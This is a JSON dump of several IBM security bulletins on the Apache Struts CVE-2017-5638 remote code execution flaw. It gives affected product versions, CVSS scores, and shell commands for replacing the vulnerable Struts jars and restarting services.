/tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/struts2-spring-plugin-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/gui/$EGO_VERSION/lib/xwork-core-*.jar /tmp/guibackup/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/xstream-*.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/velocity-1.5.jar /tmp/guibackup/egogui/ \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/struts2-core-*.jar /tmp/guibackup/perfgui \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfgui \n> mkdir -p /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ognl-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/freemarker-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) \n> mv $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/xwork-core-*.jar /tmp/guibackup/perfguiv5 (**For 7.2 Only**) 2.4 On each management host, unzip the struts-2.3.32-lib.zip package and copy the following files to your cluster directory: **\\- For IBM Platform Symphony 7.1.1:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/3.3/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/soam/7.1.1/symgui/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/3.3/perfgui/WEB-INF/lib/ \n**\\- For IBM Spectrum Symphony 7.1.2 and 7.2:** \n> unzip -u struts-2.3.32-lib.zip \n> cd struts-2.3.32/lib/ \n> cp commons-fileupload-1.3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-io-2.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp commons-lang3-3.2.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp javassist-3.11.0.GA.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-json-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp struts2-spring-plugin-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/gui/$EGO_VERSION/lib/ \n> cp xstream-1.4.8.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp velocity-1.6.4.jar $EGO_TOP/wlp/usr/servers/gui/apps/ego/$EGO_VERSION/platform/WEB-INF/lib/ \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp struts2-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfgui/WEB-INF/lib/ \n> cp ognl-3.0.19.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp freemarker-2.3.22.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) \n> cp xwork-core-2.3.32.jar $EGO_TOP/wlp/usr/servers/gui/apps/perf/$EGO_VERSION/perfguiv5/WEB-INF/lib/ (**For 7.2 Only**) 2.5 Clean up the GUI work directories on all management hosts: > rm -rf $EGO_TOP/gui/work/* \n> rm -rf $EGO_TOP/gui/workarea/* \n**NOTE: **If you changed the default configuration for the WLP_OUTPUT_DIR environment variable and the APPEND_HOSTNAME_TO_WLP_OUTPUT_DIR parameter is set to true in the $EGO_CONFDIR/wlp.conf file, you must clean up the $WLP_OUTPUT_DIR/webgui_hostname/gui/workarea/ directory. 2.6 Launch a web browser and clear your browser\u2019s cache. \n2.7 Start the WEBGUI service: > egosh service start WEBGUI\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:45", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts 2 affects IBM Platform Symphony and IBM Spectrum Symphony (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:45", "id": "02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "href": "https://www.ibm.com/support/pages/node/631039", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T18:21:24", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 840 and FlashSystem\u2122 900 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \n \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2. \n \nCode versions affected include supported VRMFs: \n\u00b7 1.4.0.0 \u2013 1.4.6.0 \n\u00b7 1.3.0.0 \u2013 1.3.0.7\n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**FlashSystem ****840 MTM: ** \n9840-AE1 & \n9843-AE1 \n \n**FlashSystem 900 MTMs:** \n9840-AE2 & \n9843-AE2| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___ Fixed code VRMF .__ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_| _ __N/A_| [**_FlashSystem 840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+840&release=All&platform=All&function=all>)** **and [**_FlashSystem 900 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+900&release=All&platform=All&function=all>)** **are available @ IBM\u2019s Fix Central_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem models 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2023-02-18T01:45:50", "id": "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "href": "https://www.ibm.com/support/pages/node/697155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:52:21", "description": "## Summary\n\nAn Apache Struts vulnerability of arbitrary code execution was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) **DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. CVSS Base Score: 7.3 CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_Platform Cluster Manager Standard Edition_| _4.1.0, 4.1.1, 4.1.1.1, 4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform Cluster Manager Advanced Edition_| _4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform HPC_| _4.1.1, 4.1.1.1, 4.2.0, 4.2.1_| _None_| _See workaround_ \n_Spectrum Cluster Foundation_| _4.2.2_| _None_| _See workaround_ \n \n## Workarounds and Mitigations\n\nPlatform Cluster Manager 4.2.1 & Platform HPC 4.2.1 & Spectrum Cluster Foundation 4.2.2 \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.32/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.2.0 4.2.0.x & Platform HPC 4.2.0 4.2.0.x** \n \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n4 # mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n \n5 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x** \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node \n# mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib/ # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pmcadmin stop # pmcadmin start # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pmcadmin stop # pmcadmin start \n \n \nIf providing a mitigation add this line to this section: \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:33", "type": "ibm", "title": "Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:33", "id": "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "href": "https://www.ibm.com/support/pages/node/630909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T05:37:08", "description": "## Summary\n\nThere is a vulnerability in Apache Struts to which the IBM\u00ae FlashSystem\u2122 V840 is susceptible. An exploit of this vulnerability (CVE-2017-5638) could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Products and Versions of FlashSystem V840\u2019s two node types \n** \n_Storage Node_ \n\u00b7 Machine Type Models (MTMs) affected include 9846-AE1 and 9848-AE1 \n\u00b7 Code versions affected include supported VRMFs: \no 1.4.0.0 \u2013 1.4.6.0 \no 1.3.0.0 \u2013 1.3.0.7 \n \n_Controller Node _ \n\u00b7 MTMs affected include 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n\u00b7 Code versions affected include supported VRMFs: \no 7.8.0.0 \u2013 7.8.0.2 \no 7.7.0.0 \u2013 7.7.1.5\n\n## Remediation/Fixes\n\n_V840 MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 & \n9848-AE1 \n \n**Controller nodes:** \n9846-AC0, \n9846-AC1, \n9848-AC0, & \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream: \n \n___Storage Node VRMF __ \n_1.4 stream: 1.4.6.1 _ \n_1.3 stream: 1.3.0.8_ \n \n__Controller Node VRMF __ \n_7.8 stream: 7.8.1.0_ \n_7.7 stream: 7.7.1.6_| _ __N/A_| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:32:46", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T00:32:46", "id": "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "href": "https://www.ibm.com/support/pages/node/697157", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-13T09:36:02", "description": "## Summary\n\nA vulnerability in the Apache Struts component affects the Service Assistant GUI of Storwize V7000 Unified allowing arbitrary code execution. The Command Line Interface is unaffected.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nIBM Storwize V7000 Unified \nThe product is affected when running code releases 1.5.x and 1.6.0.0 to 1.6.2.1\n\n## Remediation/Fixes\n\nA fix for these issues is in version 1.6.2.2 of IBM Storwize V7000 Unified. Version 1.5 is end of service. Customers running on this release of IBM Storwize V7000 Unified can upgrade to v1.6.2.2 for a fix. \n \n[_Latest Storwize V7000 Unified Software_](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1003918&myns=s028&mynp=OCST5Q4U&mync=E>) \n \nPlease contact IBM support for assistance in upgrading your system.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T00:34:31", "type": "ibm", "title": "Security Bulletin:Vulnerability in Apache Struts affects Storwize V7000 Unified (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 